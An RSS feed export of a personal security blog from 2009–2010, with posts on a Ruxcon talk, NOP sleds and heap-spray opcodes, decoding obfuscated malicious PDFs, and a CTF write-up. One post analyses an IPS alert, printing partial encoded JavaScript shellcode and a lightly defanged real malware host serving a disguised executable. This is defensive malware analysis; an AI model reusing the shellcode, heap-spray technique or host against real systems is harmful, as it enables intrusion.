<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	xmlns:georss="http://www.georss.org/georss" xmlns:geo="http://www.w3.org/2003/01/geo/wgs84_pos#" xmlns:media="http://search.yahoo.com/mrss/"
	>

<channel>
	<title>Lordparody&#039;s Blog</title>
	<atom:link href="http://lordparody.wordpress.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://lordparody.wordpress.com</link>
	<description>Horses become unicorns after reading this!</description>
	<lastBuildDate>Thu, 05 Jan 2012 08:47:31 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.com/</generator>
<cloud domain='lordparody.wordpress.com' port='80' path='/?rsscloud=notify' registerProcedure='' protocol='http-post' />
<image>
		<url>http://s2.wp.com/i/buttonw-com.png</url>
		<title>Lordparody&#039;s Blog</title>
		<link>http://lordparody.wordpress.com</link>
	</image>
	<atom:link rel="search" type="application/opensearchdescription+xml" href="http://lordparody.wordpress.com/osd.xml" title="Lordparody&#039;s Blog" />
	<atom:link rel='hub' href='http://lordparody.wordpress.com/?pushpress=hub'/>
		<item>
		<title>Ghost in the Shell(code)</title>
		<link>http://lordparody.wordpress.com/2010/11/23/ghost-in-the-shellcode/</link>
		<comments>http://lordparody.wordpress.com/2010/11/23/ghost-in-the-shellcode/#comments</comments>
		<pubDate>Tue, 23 Nov 2010 14:34:23 +0000</pubDate>
		<dc:creator>lordparody</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://lordparody.wordpress.com/?p=46</guid>
		<description><![CDATA[Heyas! Just got back the other day from Melbourne and Ruxcon. Awesome and fantastic &#8216;con for aussies. 2 days of great talks and copious alcohol. If you&#8217;ve had your head in the sand and not noticed, I presented a talk at Ruxcon! My talk was based on 2 incidents that happened at work and how [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=lordparody.wordpress.com&amp;blog=9056582&amp;post=46&amp;subd=lordparody&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Heyas!</p>
<p>Just got back the other day from Melbourne and Ruxcon. Awesome and fantastic &#8216;con for aussies. 2 days of great talks and copious alcohol.</p>
<p>If you&#8217;ve had your head in the sand and not noticed, I presented a talk at Ruxcon!</p>
<p>My talk was based on 2 incidents that happened at work and how they stepped sideways from your normal attacks online. First was a binary delivered in an encoded form that the shellcode operates on after download to restore it to a working format. The second incident was a targeted attack in which the malware binary used shellcode as a function delivery system.</p>
<p>I&#8217;m looking to be able to publish the slides shortly plus the samples for the first incident for your own playing around with.</p>
<p>Hopefully I&#8217;ll update this again on the weekend and share more on my talk.</p>
<p>&nbsp;</p>
<p>Slack and late update &#8211; link to the presentation is <a title="http://www.ruxcon.org.au/archive/2010-materials/" href="http://www.ruxcon.org.au/archive/2010-materials/">http://www.ruxcon.org.au/archive/2010-materials/</a> , Check out the content from the other talks while you&#8217;re there!</p>
<p>I have a new website in development,  <a title="http://lordparody.com" href="http://lordparody.com">http://lordparody.com </a>which will host samples of exploits and reviews of their methods.</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/lordparody.wordpress.com/46/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/lordparody.wordpress.com/46/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/lordparody.wordpress.com/46/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/lordparody.wordpress.com/46/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/lordparody.wordpress.com/46/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/lordparody.wordpress.com/46/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/lordparody.wordpress.com/46/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/lordparody.wordpress.com/46/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/lordparody.wordpress.com/46/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/lordparody.wordpress.com/46/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/lordparody.wordpress.com/46/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/lordparody.wordpress.com/46/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/lordparody.wordpress.com/46/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/lordparody.wordpress.com/46/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=lordparody.wordpress.com&amp;blog=9056582&amp;post=46&amp;subd=lordparody&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://lordparody.wordpress.com/2010/11/23/ghost-in-the-shellcode/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/4cae792c55df6bb7b3f401bbb280ce13?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">lordparody</media:title>
		</media:content>
	</item>
		<item>
		<title>Just slide..</title>
		<link>http://lordparody.wordpress.com/2010/03/09/just-slide/</link>
		<comments>http://lordparody.wordpress.com/2010/03/09/just-slide/#comments</comments>
		<pubDate>Tue, 09 Mar 2010 08:40:57 +0000</pubDate>
		<dc:creator>lordparody</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://lordparody.wordpress.com/?p=39</guid>
		<description><![CDATA[Sorry for not posting often. Actually..  I&#8217;m not sorry. I&#8217;m happy I&#8217;m not posting daily purely to have stuff up daily. I aim to make posts whenever I find something interesting to share, simple or complex. Today is complex simplicity! NOP Sleds or NOP Slides. previously recognized by the opcode 0&#215;90, this has moved on [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=lordparody.wordpress.com&amp;blog=9056582&amp;post=39&amp;subd=lordparody&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Sorry for not posting often. Actually..  I&#8217;m not sorry. I&#8217;m happy I&#8217;m not posting daily purely to have stuff up daily. <img src='http://s2.wp.com/wp-includes/images/smilies/icon_razz.gif' alt=':P' class='wp-smiley' /> </p>
<p>I aim to make posts whenever I find something interesting to share, simple or complex.</p>
<p>Today is complex simplicity! <img src='http://s0.wp.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> </p>
<p>NOP Sleds or NOP Slides.</p>
<p>previously recognized by the opcode 0&#215;90, this has moved on and into bigger and more worldly ways.</p>
<p>Many of you have reviewed exploits and shellcode related to them and you always spot this extra bit of data that gets sprayed like &#8220;0x0c0c&#8221; or &#8220;0x0c0d&#8221; or &#8220;0x0a0a&#8221;.  These sweet opcodes serve multiple purposes when used as part of a heap spray. They can facilitate return addresses for where your code should redirect the exploited EIP. They also double as a NOP sled.</p>
<p>I&#8217;ve entered these opcodes into a debugger over a blank .exe file with a series of 0&#215;90 opcodes as a filler.</p>
<blockquote><p>00401020   .  0A0A          OR      CL, BYTE PTR DS:[EDX]<br />
00401022   .  0A0A          OR      CL, BYTE PTR DS:[EDX]<br />
00401024   .  0A0A          OR      CL, BYTE PTR DS:[EDX]<br />
00401026   .  0A0A          OR      CL, BYTE PTR DS:[EDX]<br />
00401028   .  90            NOP<br />
00401029   .  90            NOP<br />
0040102A   .  90            NOP<br />
0040102B   .  90            NOP<br />
0040102C   .  0C 0C         OR      AL, 0C<br />
0040102E   .  0C 0C         OR      AL, 0C<br />
00401030   .  0C 0C         OR      AL, 0C<br />
00401032   .  0C 0C         OR      AL, 0C<br />
00401034   .  90            NOP<br />
00401035   .  90            NOP<br />
00401036   .  90            NOP<br />
00401037   .  90            NOP<br />
00401038   .  0C 0D         OR      AL, 0D<br />
0040103A   .  0C 0D         OR      AL, 0D<br />
0040103C   .  0C 0D         OR      AL, 0D<br />
0040103E   .  0C 0D         OR      AL, 0D<br />
00401040   .  90            NOP<br />
00401041   .  90            NOP<br />
00401042   .  90            NOP<br />
00401043   .  90            NOP<br />
00401044   .  0D 0C0D0C0D   OR      EAX, 0D0C0D0C<br />
00401049   .  0C 0D         OR      AL, 0D<br />
0040104B   .  0C 90         OR      AL, 90</p></blockquote>
<p>I&#8217;ve included the 0c0d and it&#8217;s inverted 0d0c variant to demonstrate how it would look if your alignment landed badly. The code corrects itself and will continue the slide.</p>
<p>The intention of a NOP sled is to do no operation yet retain control of EIP.  This gives your exploit a larger surface area to land on when dealing with the heap and the difficulty to predict where your shellcode will end up.</p>
<p>The shellcode above shows WORD size nop sleds. The opcode up from the original 0&#215;90 is also usable for a NOP sled. 0&#215;91! This single byte opcode can be used when you know your alignment is out and you don&#8217;t care about the contents of EAX or ECX.</p>
<blockquote><p>00401014      91            XCHG    EAX, ECX<br />
00401015      91            XCHG    EAX, ECX<br />
00401016      91            XCHG    EAX, ECX<br />
00401017      91            XCHG    EAX, ECX</p></blockquote>
<p>You would follow the NOP sled with corrective instructions like XOR EAX, EAX; XOR ECX, ECX. This would reset contents of the registers and clear any exchange of data between the two registers.</p>
<p>This is by no means a detailed look at NOP sleds but just something to open your eyes and so you can begin to understand what the extra code around the shellcode in an exploit is for.</p>
<p>There may be sections in this I might be incorrect about, but feel free to bombard the comments or DM me on twitter.</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/lordparody.wordpress.com/39/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/lordparody.wordpress.com/39/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/lordparody.wordpress.com/39/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/lordparody.wordpress.com/39/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/lordparody.wordpress.com/39/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/lordparody.wordpress.com/39/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/lordparody.wordpress.com/39/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/lordparody.wordpress.com/39/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/lordparody.wordpress.com/39/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/lordparody.wordpress.com/39/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/lordparody.wordpress.com/39/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/lordparody.wordpress.com/39/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/lordparody.wordpress.com/39/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/lordparody.wordpress.com/39/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=lordparody.wordpress.com&amp;blog=9056582&amp;post=39&amp;subd=lordparody&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://lordparody.wordpress.com/2010/03/09/just-slide/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/4cae792c55df6bb7b3f401bbb280ce13?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">lordparody</media:title>
		</media:content>
	</item>
		<item>
		<title>PDF shenannigans!</title>
		<link>http://lordparody.wordpress.com/2009/12/21/pdf-shenannigans/</link>
		<comments>http://lordparody.wordpress.com/2009/12/21/pdf-shenannigans/#comments</comments>
		<pubDate>Mon, 21 Dec 2009 07:40:01 +0000</pubDate>
		<dc:creator>lordparody</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://lordparody.wordpress.com/?p=36</guid>
		<description><![CDATA[_MDL_ from the MalwareDomainList website tweeted on the weekend about a couple of PDF samples that wouldn&#8217;t decode. http://www.malwaredomainlist.com/forums/index.php?topic=3626 So naturally I jumped in and had a look. Putting the samples on a testbed and looking at them made it quite clear straight away what the problem was. pdf-parser.py from Didier Stevens didn&#8217;t support the [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=lordparody.wordpress.com&amp;blog=9056582&amp;post=36&amp;subd=lordparody&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>_MDL_ from the MalwareDomainList website tweeted on the weekend about a couple of PDF samples that wouldn&#8217;t decode.</p>
<p><a href="http://www.malwaredomainlist.com/forums/index.php?topic=3626">http://www.malwaredomainlist.com/forums/index.php?topic=3626 </a></p>
<p>So naturally I jumped in and had a look.</p>
<p>Putting the samples on a testbed and looking at them made it quite clear straight away what the problem was. pdf-parser.py from Didier Stevens didn&#8217;t support the filters used to encode the data stream. UHOH!</p>
<p>So now what?</p>
<p>&#8220;Lets make some decoders!&#8221;, I hear you call out.</p>
<p>well screw that! <img src='http://s2.wp.com/wp-includes/images/smilies/icon_razz.gif' alt=':P' class='wp-smiley' /> </p>
<p>&#8220;Lets steal some decoders!&#8221;, you yell at me.</p>
<p>Yeah, ok.</p>
<p>Firstly we need to know what we&#8217;re needing to look for, these are standard filters in Adobe products and there should be something in one of the open source projects that we can look at.</p>
<p>sample 1: /Filter [ /ASCIIHexDecode /LZWDecode /ASCII85Decode /RunLengthDecode</p>
<p>sample 2: /Filter [/ASCIIHexDecode /LZWDecode /ASCII85Decode /RunLengthDecode /FlateDecode ]</p>
<p>Didier&#8217;s parser already supports the ASCIIHexDecode, ASCII85Decode and FlateDecode, we need LZW and RLE decoding now.</p>
<p>After a bunch of time sorting through the crap links from the not so crap links, I stumbled upon <a href="http://www.unixuser.org/~euske/python/pdfminer/index.html">&#8220;pdfminer&#8221;</a> which already had a LZW routine setup in python I could use. Still no RLE decoder though.</p>
<p>One small grace for the first sample, RLE was the last stage to decode. By removing the /RunLengthDecode filter statement, I was able to get the script to parse the file and give me some output!</p>
<p>While the output wasn&#8217;t as good as it could have been, the RLE was mostly ineffective at compressing the stream but only in obfuscating it partially. Much of the javascript was readable and it was possible to figure out what the intention was. MAYHEM! and trojans. I was able to immediately spot some well known pdf exploits. Collab.getIcon, Collab.collectEmailInfo, etc.</p>
<p>The 2nd sample had to wait, as it needed a clean decode from the RLE to pass into the FlateDecode filter.</p>
<p>I passed the samples on to others in my team to look at and one of the guys better at python than me ( everyone is better at python than me <img src='http://s2.wp.com/wp-includes/images/smilies/icon_razz.gif' alt=':P' class='wp-smiley' />  ) made a RLE decode function that worked great and we were able to decode the 2 samples.</p>
<p>Once I get his all clear, I&#8217;ll see about releasing something for your use/abuse at home. :]</p>
<p>Not much tech in this post, but I think those who&#8217;ve been in this position before know what it&#8217;s like finding a tool that doesn&#8217;t quite meet your needs and finding out you have the ability to modify it to suit. Don&#8217;t give up and google is a great tool. Remember to respect the copyrights of what you use, credit them where possible and even let the original author update their tool with your findings.</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/lordparody.wordpress.com/36/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/lordparody.wordpress.com/36/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/lordparody.wordpress.com/36/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/lordparody.wordpress.com/36/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/lordparody.wordpress.com/36/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/lordparody.wordpress.com/36/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/lordparody.wordpress.com/36/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/lordparody.wordpress.com/36/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/lordparody.wordpress.com/36/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/lordparody.wordpress.com/36/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/lordparody.wordpress.com/36/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/lordparody.wordpress.com/36/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/lordparody.wordpress.com/36/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/lordparody.wordpress.com/36/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=lordparody.wordpress.com&amp;blog=9056582&amp;post=36&amp;subd=lordparody&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://lordparody.wordpress.com/2009/12/21/pdf-shenannigans/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/4cae792c55df6bb7b3f401bbb280ce13?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">lordparody</media:title>
		</media:content>
	</item>
		<item>
		<title>shellcode does what?!</title>
		<link>http://lordparody.wordpress.com/2009/11/27/shellcode-does-what/</link>
		<comments>http://lordparody.wordpress.com/2009/11/27/shellcode-does-what/#comments</comments>
		<pubDate>Fri, 27 Nov 2009 07:31:13 +0000</pubDate>
		<dc:creator>lordparody</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://lordparody.wordpress.com/?p=20</guid>
		<description><![CDATA[I had an IPS event pop up that I got to review. File is a static javascript variable ( bit of an oxymoron I know )  that had shellcode defined. Ran the URL into my local jsunpack and had a look at what it was able to find. matt@malicious:~/research/jsunpack-n$ ./jsunpack-n.py -a -V -u &#8220;bbs. xcdx169. [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=lordparody.wordpress.com&amp;blog=9056582&amp;post=20&amp;subd=lordparody&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p style="text-align:left;">I had an IPS event pop up that I got to review.</p>
<p style="text-align:left;">File is a static javascript variable ( bit of an oxymoron I know <img src='http://s2.wp.com/wp-includes/images/smilies/icon_razz.gif' alt=':P' class='wp-smiley' />  )  that had shellcode defined.</p>
<p style="text-align:left;">Ran the URL into my local jsunpack and had a look at what it was able to find.</p>
<blockquote>
<p style="text-align:left;">matt@malicious:~/research/jsunpack-n$ ./jsunpack-n.py -a -V -u &#8220;bbs. xcdx169. net /images /img /k /lll.jpg&#8221;<br />
URL fetch bbs. xcdx169. net /images /img /k /lll.jpg<br />
(referer=www.google.com/trends/hottrends)<br />
saved 4420 bytes to ./files/fetch_9ea2e60fd34ad1b771a600faa7f0c5cc88d31f2a</p>
<p>Processing ./files/fetch_9ea2e60fd34ad1b771a600faa7f0c5cc88d31f2a<br />
[nothing detected] bbs. xcdx169. net /images /img /k /lll.jpg<br />
info: [decodingLevel=0] found JavaScript<br />
info: saved original parsed JavaScript to ./files/veryverbose_9ea2e60fd34ad1b771a600faa7f0c5cc88d31f2a</p>
<p>[file] created ./files/fetch_9ea2e60fd34ad1b771a600faa7f0c5cc88d31f2a from bbs. xcdx169. net /images /img /k /lll.jpg<br />
[file] created ./files/veryverbose_9ea2e60fd34ad1b771a600faa7f0c5cc88d31f2a from bbs. xcdx169. net /images /img /k /lll.jpg</p>
<p>matt@malicious:~/research/jsunpack-n$ cat ./files/fetch_9ea2e60fd34ad1b771a600faa7f0c5cc88d31f2a</p>
<p>var YT00=&#8221;\xu10EB\xu4B5B\xuC933\xuFBB1\xu04B5\xu3480\xuF40B\xuFAE2\xu05EB\xuEBE8\xuFFFF\xu1DFF\xuF0AE\xuF4F4\xu90AB\xuC455&#8243;;<br />
var YT01=&#8221;\xuF4F4\xu7FF4\xuF8B4\xu847F\xu59E8\xu9C7F\xu7FFC\xu9E03\xuADFB\xu0E1C\xuF4F7\xu16F4\xu9E0D\xu9C98\xu809A\xu9890&#8243;;</p>
<p>&#8230;..   Cut for Blog ( download link above if you want to look at the full thing. )</p>
<p>var YT23=&#8221;\xuD0AA\xu29F7\xu7F92\xuBFF8\xuAA7F\xuF7E8\xu7F29\xu7FF0\xu31F7\xuAA5F\xu37AD\xu551C\xu0B0F\xu7A0B\xuFABA\xu5E18&#8243;;<br />
var YT24=&#8221;\xuF908\xu7C88\xuB90E\xu512F\xuF4E3\xuE288\xu0E91\xuEBE4\xuFE8D\xu0F1C\xu0963\xuD1FB\xu0B44\xu1036\xuBE30\xuEF1B&#8221;;<br />
var YT25=&#8221;\xuB232\xu8A8D\xu162C\xu3487\xu1663\xu291B\xu4968\xu6886\xuEE61\xu559A\xuC99E\xu162C\xu953E\xuA312\xu4154\xuC24F&#8221;;<br />
var YT26=&#8221;\xuDBEE\xuE684\xu3FF6\xu6EE1\xu8ADF\xu11AF\xuDCE8\xuBE3B\xu0FFC\xu5141\xu9CEE\xu281F\xu9A3E&#8221;;<br />
var YT27=&#8221;\xu9c9f\xu8080\xuce84\xudbdb\xu9696\xuda87\xu978c\xu8c90\xuc2c5\xudacd\xu919a\xudb80\xu999d\xu9395\xu8791\xu9ddb\xu9399\xu9cdb\xuda8c\xu8797\xuf487\xuf4&#8243;;</p>
<p>matt@malicious:~/research/jsunpack-n$</p></blockquote>
<p style="text-align:left;">( I&#8217;ve edited the shellcode from % to \x so if you download the above file and see it is different don&#8217;t be thinking I&#8217;m making stuff up <img src='http://s2.wp.com/wp-includes/images/smilies/icon_razz.gif' alt=':P' class='wp-smiley' />  )</p>
<p style="text-align:left;">Since I&#8217;ve not seen what has delivered this to the user, I&#8217;m left with loading it somehow to review it.</p>
<p style="text-align:left;">I dump the shellcode into <a href="http://sandsprite.com/shellcode_2_exe.php" target="_blank">http://sandsprite.com/shellcode_2_exe.php</a> which will give you a .exe file with the shellcode attached. So you can load it up in Ollydbg and have a quick look.</p>
<p style="text-align:left;"><a href="http://lordparody.files.wordpress.com/2009/11/olly.jpg"><img class="alignnone size-medium wp-image-24" title="olly" src="http://lordparody.files.wordpress.com/2009/11/olly.jpg?w=300&#038;h=228" alt="" width="300" height="228" /></a></p>
<p style="text-align:left;">As you can see there is the original stub that loads WSAStartup to load any references to winsock calls.  In this I&#8217;ve also hilighted within the small piece of code attached from the shellcode that its another stub but for an XOR encryption. As you can see, the XOR key is right there, 0xF4. There are 2 ways to go from here. We could step through the code to let it decrypt itself or since we know the key for the XOR we can just copy&amp;paste the rest of the shellcode into WinHex and just manually let it decode the whole block.</p>
<p style="text-align:left;"><a href="http://lordparody.files.wordpress.com/2009/11/hex_xor_f4.jpg"><img class="alignnone size-medium wp-image-25" title="hex_xor_f4" src="http://lordparody.files.wordpress.com/2009/11/hex_xor_f4.jpg?w=291&#038;h=300" alt="" width="291" height="300" /></a></p>
<p style="text-align:left;">We click OK and the code should dump out like this.</p>
<p style="text-align:left;"><a href="http://lordparody.files.wordpress.com/2009/11/winhex_after_xor_f4.jpg"><img class="alignnone size-medium wp-image-26" title="winhex_after_xor_f4" src="http://lordparody.files.wordpress.com/2009/11/winhex_after_xor_f4.jpg?w=300&#038;h=228" alt="" width="300" height="228" /></a></p>
<p style="text-align:left;">And at the end of the block we can see another URL that will be downloaded by the shellcode and executed.</p>
<blockquote>
<p style="text-align:left;">matt@malicious:~/research/jsunpack-n$ ./jsunpack-n.py -a -V -u &#8220;http://bbs. xcdx169. net /images /img /hx.css&#8221;<br />
URL fetch bbs. xcdx169. net /images /img /hx.css<br />
(referer=www.google.com/trends/hottrends)<br />
saved 25088 bytes to ./files/fetch_8c3187ccfb755b516513ae9f68579b7bc75b0cef</p>
<p>Processing ./files/fetch_8c3187ccfb755b516513ae9f68579b7bc75b0cef<br />
[nothing detected] [MZ] bbs. xcdx169. net /images /img /hx.css<br />
info: [0] executable file</p>
<p>[file] created ./files/fetch_8c3187ccfb755b516513ae9f68579b7bc75b0cef from bbs. xcdx169. net /images /img /hx.css</p>
<p>matt@malicious:~/research/jsunpack-n$ file ./files/fetch_8c3187ccfb755b516513ae9f68579b7bc75b0cef<br />
./files/fetch_8c3187ccfb755b516513ae9f68579b7bc75b0cef: PE32 executable for MS Windows (GUI) Intel 80386 32-bit<br />
matt@malicious:~/research/jsunpack-n$ md5sum ./files/fetch_8c3187ccfb755b516513ae9f68579b7bc75b0cef<br />
883e3c54c21fda4efae0fc85ff96724c  ./files/fetch_8c3187ccfb755b516513ae9f68579b7bc75b0cef</p></blockquote>
<p style="text-align:left;">
<p style="text-align:left;">We have a .exe file loaded from the site which hosted it as a .css. This .exe has reasonable coverage from VirusTotal.</p>
<p style="text-align:left;"><a href="http://www.virustotal.com/analisis/ba998b7df2fa3dd3816e8bb57798ff35d6a942be2f8cddde6647b8067ca42d30-1259022619">http://www.virustotal.com/analisis/ba998b7df2fa3dd3816e8bb57798ff35d6a942be2f8cddde6647b8067ca42d30-1259022619</a></p>
<p style="text-align:left;">
<p style="text-align:left;">
<p style="text-align:left;">
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/lordparody.wordpress.com/20/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/lordparody.wordpress.com/20/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/lordparody.wordpress.com/20/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/lordparody.wordpress.com/20/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/lordparody.wordpress.com/20/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/lordparody.wordpress.com/20/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/lordparody.wordpress.com/20/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/lordparody.wordpress.com/20/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/lordparody.wordpress.com/20/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/lordparody.wordpress.com/20/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/lordparody.wordpress.com/20/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/lordparody.wordpress.com/20/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/lordparody.wordpress.com/20/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/lordparody.wordpress.com/20/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=lordparody.wordpress.com&amp;blog=9056582&amp;post=20&amp;subd=lordparody&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://lordparody.wordpress.com/2009/11/27/shellcode-does-what/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/4cae792c55df6bb7b3f401bbb280ce13?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">lordparody</media:title>
		</media:content>

		<media:content url="http://lordparody.files.wordpress.com/2009/11/olly.jpg?w=300" medium="image">
			<media:title type="html">olly</media:title>
		</media:content>

		<media:content url="http://lordparody.files.wordpress.com/2009/11/hex_xor_f4.jpg?w=291" medium="image">
			<media:title type="html">hex_xor_f4</media:title>
		</media:content>

		<media:content url="http://lordparody.files.wordpress.com/2009/11/winhex_after_xor_f4.jpg?w=300" medium="image">
			<media:title type="html">winhex_after_xor_f4</media:title>
		</media:content>
	</item>
		<item>
		<title>CSAW CTF video #2</title>
		<link>http://lordparody.wordpress.com/2009/11/21/csaw-ctf-video-2/</link>
		<comments>http://lordparody.wordpress.com/2009/11/21/csaw-ctf-video-2/#comments</comments>
		<pubDate>Sat, 21 Nov 2009 04:26:08 +0000</pubDate>
		<dc:creator>lordparody</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://lordparody.wordpress.com/?p=17</guid>
		<description><![CDATA[This is the video for binaries 2.exe, 3.exe and 4.exe.  These aren&#8217;t intended to be major indepth tutorials, only a demonstration of how I retrieved the flag from each binary. I&#8217;m not the greatest at reversing or making videos.  I just like to share whatever I can. :] &#160; Thanks for your positive comments so [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=lordparody.wordpress.com&amp;blog=9056582&amp;post=17&amp;subd=lordparody&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>This is the video for binaries 2.exe, 3.exe and 4.exe.  These aren&#8217;t intended to be major indepth tutorials, only a demonstration of how I retrieved the flag from each binary. I&#8217;m not the greatest at reversing or making videos.  I just like to share whatever I can. :]</p>
<span style="text-align:center; display: block;"><a href="http://lordparody.wordpress.com/2009/11/21/csaw-ctf-video-2/"><img src="http://img.youtube.com/vi/_Ld1cD9d7tI/2.jpg" alt="" /></a></span>
<p>&nbsp;</p>
<p>Thanks for your positive comments so far <img src='http://s0.wp.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> </p>
